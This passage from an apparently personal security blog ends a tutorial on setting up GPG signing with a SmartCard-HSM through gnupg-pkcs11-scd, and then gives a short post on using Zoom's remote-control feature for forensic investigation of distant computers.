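openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
  -keyout /tmp/demo.key -out /tmp/demo.pem \
  -subj "/CN=gpg.intern.stafnet.local"
openssl x509 -outform der -in /tmp/demo.pem -out /tmp/demo.der
openssl x509 -inform der -in /tmp/demo.der -noout -subject
```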

Upload the certificate to the smartcard(s)

$ pkcs11-tool --module /usr/lib64/ -l --write-object cert.der --type cert --id 47490caa5589d5b95e2067c5bc49b03711b854da --label "gpg.intern.stafnet.local"
Using slot 0 with a present token (0x0)
Logging in to "UserPIN (SmartCard-HSM)".
Please enter User PIN: 
Created certificate:
Certificate Object; type = X.509 cert
  label:      gpg.intern.stafnet.local
  subject:    DN: CN=gpg.intern.stafnet.local
  ID:         47490caa5589d5b95e2067c5bc49b03711b854da

Setup the gpg-agent

Install gnupg-pkcs11-scd from your GNU/Linux distribution’s package manager.

Configure gnupg-agent

$ cat ~/.gnupg/gpg-agent.conf
scdaemon-program /usr/bin/gnupg-pkcs11-scd
pinentry-program /usr/bin/pinentry
$ cat ~/.gnupg/gnupg-pkcs11-scd.conf
providers smartcardhsm
provider-smartcardhsm-library /usr/lib64/

Reload the agent

$ gpg-agent --server gpg-connect-agent << EOF
RELOADAGENT
EOF


$ gpg --card-status
Application ID ...: D2760001240111503131171B486F1111
Version ..........: 11.50
Manufacturer .....: unknown
Serial number ....: 171B486F
Name of cardholder: [not set]
Language prefs ...: [not set]
Sex ..............: unspecified
URL of public key : [not set]
Login data .......: [not set]
Signature PIN ....: forced
Key attributes ...: 1R 1R 1R
Max. PIN lengths .: 0 0 0
PIN retry counter : 0 0 0
Signature counter : 0
Signature key ....: [none]
Encryption key....: [none]
Authentication key: [none]
General key info..: [none]

Get the GPG KEY-FRIEDNLY string (sic — this is the literal string gnupg-pkcs11-scd prints)

$ gpg-agent --server gpg-connect-agent << EOF
OK Pleased to meet you
gnupg-pkcs11-scd[26682.2406156096]: Listening to socket '/tmp/gnupg-pkcs11-scd.NeQexh/agent.S'
gnupg-pkcs11-scd[26682.2406156096]: accepting connection
gnupg-pkcs11-scd[26682]: chan_0 -> OK PKCS#11 smart-card server for GnuPG ready
gnupg-pkcs11-scd[26682.2406156096]: processing connection
gnupg-pkcs11-scd[26682]: chan_0 <- GETINFO socket_name
gnupg-pkcs11-scd[26682]: chan_0 -> D /tmp/gnupg-pkcs11-scd.NeQexh/agent.S
gnupg-pkcs11-scd[26682]: chan_0 -> OK
gnupg-pkcs11-scd[26682]: chan_0 <- LEARN
gnupg-pkcs11-scd[26682]: chan_0 -> S SERIALNO D2760001240111503131171B486F1111
gnupg-pkcs11-scd[26682]: chan_0 -> S APPTYPE PKCS11
S SERIALNO D2760001240111503131171B486F1111
gnupg-pkcs11-scd[26682]: chan_0 -> S KEY-FRIEDNLY 5780C7B3D0186C21C8C4503DDA7641FC71FD9B54 /CN=gpg.intern.stafnet.local on UserPIN (SmartCard-HSM)
gnupg-pkcs11-scd[26682]: chan_0 -> S CERTINFO 101 www\x2ECardContact\x2Ede/PKCS\x2315\x20emulated/DECM0102330/UserPIN\x20\x28SmartCard\x2DHSM\x29/47490CAA5589D5B95E2067C5BC49B03711B854DA
gnupg-pkcs11-scd[26682]: chan_0 -> S KEYPAIRINFO 5780C7B3D0186C21C8C4503DDA7641FC71FD9B54 www\x2ECardContact\x2Ede/PKCS\x2315\x20emulated/DECM0102330/UserPIN\x20\x28SmartCard\x2DHSM\x29/47490CAA5589D5B95E2067C5BC49B03711B854DA
gnupg-pkcs11-scd[26682]: chan_0 -> OK
S KEY-FRIEDNLY 5780C7B3D0186C21C8C4503DDA7641FC71FD9B54 /CN=gpg.intern.stafnet.local on UserPIN (SmartCard-HSM)
S CERTINFO 101 www\x2ECardContact\x2Ede/PKCS\x2315\x20emulated/DECM0102330/UserPIN\x20\x28SmartCard\x2DHSM\x29/47490CAA5589D5B95E2067C5BC49B03711B854DA
S KEYPAIRINFO 5780C7B3D0186C21C8C4503DDA7641FC71FD9B54 www\x2ECardContact\x2Ede/PKCS\x2315\x20emulated/DECM0102330/UserPIN\x20\x28SmartCard\x2DHSM\x29/47490CAA5589D5B95E2067C5BC49B03711B854DA
gnupg-pkcs11-scd[26682]: chan_0 <- RESTART
gnupg-pkcs11-scd[26682]: chan_0 -> OK
$ gnupg-pkcs11-scd[26682]: chan_0 <- [eof]
gnupg-pkcs11-scd[26682.2406156096]: post-processing connection
gnupg-pkcs11-scd[26682.2406156096]: accepting connection
gnupg-pkcs11-scd[26682.2406156096]: cleanup connection
gnupg-pkcs11-scd[26682.2406156096]: Terminating
gnupg-pkcs11-scd[26682.2369189632]: Thread command terminate
gnupg-pkcs11-scd[26682.2369189632]: Cleaning up threads

Import the key into GPG

$ gpg --expert --full-generate-key
gpg (GnuPG) 2.2.19; Copyright (C) 2019 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Please select what kind of key you want:
   (1) RSA and RSA (default)
   (2) DSA and Elgamal
   (3) DSA (sign only)
   (4) RSA (sign only)
   (7) DSA (set your own capabilities)
   (8) RSA (set your own capabilities)
   (9) ECC and ECC
  (10) ECC (sign only)
  (11) ECC (set your own capabilities)
  (13) Existing key
  (14) Existing key from card
Your selection? 13

Use the KEY-FRIEDNLY string as the keygrip.


List your key

$ gpg --list-keys
pub   rsa2048 2020-05-02 [SCE]
uid           [ultimate] gpg.intern.stafnet.local (signing key) <>


Create a test file.

$ echo "I'm boe." > /tmp/boe



Sign the test file.

$ gpg --sign /tmp/boe

Enter your PIN code.

│ Please enter the PIN (PIN required for token 'SmartCard-HSM (UserPIN)' (try 0))  │
│ to unlock the card                                                               │
│                                                                                  │
│ PIN ____________________________________________________________________________ │
│                                                                                  │
│            <OK>                                                <Cancel>          │   


$ gpg --verify /tmp/boe.gpg
gpg: Signature made Sat 02 May 2020 12:16:48 PM CEST
gpg: Good signature from "gpg.intern.stafnet.local (signing key) <>" [ultimate]
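The same sign/verify round trip can be rehearsed with a throwaway software key (no smartcard) in an isolated GNUPGHOME — a sketch only; the demo@example.test identity is made up:

```shell
# Rehearse the sign/verify flow with a disposable software key.
export GNUPGHOME=$(mktemp -d)
gpg --batch --pinentry-mode loopback --passphrase '' \
    --quick-generate-key demo@example.test default default never
echo "I'm boe." > /tmp/boe
gpg --batch --yes --local-user demo@example.test --sign /tmp/boe
gpg --verify /tmp/boe.gpg   # should report a good signature
```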

Have fun…


April 30, 2020

When you need to quickly investigate a suspicious computer located thousands of kilometers away, or during a pandemic like the one we are facing these days, it can be critical to gain remote access to the computer, just to perform basic investigations. Also, if the attacker did a clever job, he/she could be monitoring the processes running on the target. In this case, you should avoid using classic remote management tools like VNC, TeamViewer, etc.

The following computer is running a LanDesk process which indicates that it can be controlled remotely:


Also, if the suspicious computer is potentially under the control of the attacker, it could be interesting not to ring a bell by using classic tools. Today, web conferencing tools are very popular. Why not use them to gain remote access and start your investigations?

Via Zoom (but the feature is available in other tools too), any participant in a web conference can share his/her screen and also transfer control (mouse & keyboard) to a specific participant:


Now, you can download your favourite tools (events collector, memory dumper, etc)… This technique has many advantages:

  • No need to reconfigure a firewall to allow incoming connections
  • There’s a good chance that the web conferencing tool is already installed
  • From a forensic point of view, it has a small footprint: no new login events on the computer, no changes applied to the investigated computer
  • You gain the same rights as the connected user (which, in some (bad) cases, may already be ‘administrator’ rights)

Back to Zoom: the free subscription limits the conference duration to 40 minutes, but that’s enough to launch some tasks on the remote computer. If the meeting is aborted, just start a new one. Everything you launched will keep running…

[The post Web Conferencing Tools Used for Forensic Investigations has been first published on /dev/random]